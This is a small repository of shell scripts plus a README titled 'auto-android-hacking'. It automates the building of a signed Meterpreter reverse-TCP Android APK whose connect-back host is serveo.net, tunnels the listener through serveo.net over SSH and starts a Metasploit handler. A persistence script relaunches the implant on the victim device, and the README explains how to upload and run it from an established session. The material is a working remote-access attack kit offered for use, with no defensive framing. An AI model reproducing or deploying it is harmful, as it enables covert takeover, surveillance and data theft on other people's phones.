├── README.md ├── android-hacker.rc ├── attack.sh ├── create-payload.sh ├── install.sh ├── persistent.sh └── serveo-connect.sh /README.md: -------------------------------------------------------------------------------- 1 | # auto-android-hacking 2 | 3 | This file automates the whole process of Android Hacking in Termux. 4 | It can also be used in Kali Linux and Ubuntu with few edits in source code. 5 | To use that run the scripts in this manner. 6 | 1) ./install.sh 7 | 2) ./create-payload.sh 8 | 3) ./serveo-connect.sh 9 | 4) ./attack.sh 10 | 11 | Once installation is finished you don't need to run install script again. 12 | 13 | For Creating a new payload run the script ./create-payload.sh 14 | 15 | For only attacking run the scripts in this format. 16 | 1) ./serveo-connect.sh 17 | 2) ./attack.sh 18 | 19 | 20 | Making payload persistent-------- 21 | 22 | After that you need to get into root directory of android device by typing “cd /” in terminal. 23 | 24 | Now you need to get into /sdcard location by typing “cd /sdcard” in same terminal. 25 | 26 | Here you can upload your backdoored script by typing “upload persistent.sh” in same terminal. 27 | 28 | Now all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device. 29 | 30 | Here you need to again go into same location i.e. cd /root/sdcard and execute the backdoor using “nohup sh persistent.sh“. 31 | 32 | Your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y. 33 | -------------------------------------------------------------------------------- /android-hacker.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/handler 2 | set payload android/meterpreter/reverse_tcp 3 | set lhost localhost 4 | set lport 4444 5 | exploit -------------------------------------------------------------------------------- /attack.sh: -------------------------------------------------------------------------------- 1 | # !bin/bash 2 | # Author : Bishal Shaw 3 | 4 | service postgresql start 5 | msfconsole -r android-hacker.rc -------------------------------------------------------------------------------- /create-payload.sh: -------------------------------------------------------------------------------- 1 | # !bin/bash 2 | # Author : Bishal Shaw 3 | 4 | read -p 'Enter port for serveo: ' port 5 | read -p 'Enter output filename: ' output 6 | msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=$port R > Newtest.apk 7 | apksigner autokey Newtest.apk Testing.apk 8 | mv Testing.apk ~/storage/dcim/$output.apk 9 | rm Newtest.apk autokey 10 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | # !bin/bash 2 | # Author : Bishal Shaw 3 | # This script installs all essential components for using Android Hacking Payload. 4 | 5 | pkg update -y 6 | pkg upgrade -y 7 | pkg install unstable-repo -y 8 | termux-setup-storage 9 | pkg install metasploit -y 10 | pkg install wget openssh apksigner nano -y 11 | -------------------------------------------------------------------------------- /persistent.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | while : 3 | do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity 4 | sleep 10 5 | done -------------------------------------------------------------------------------- /serveo-connect.sh: -------------------------------------------------------------------------------- 1 | # !bin/bash 2 | # Author : Bishal Shaw 3 | 4 | read -p 'Enter serveo port: ' port 5 | ssh -R $port:localhost:4444 serveo.net --------------------------------------------------------------------------------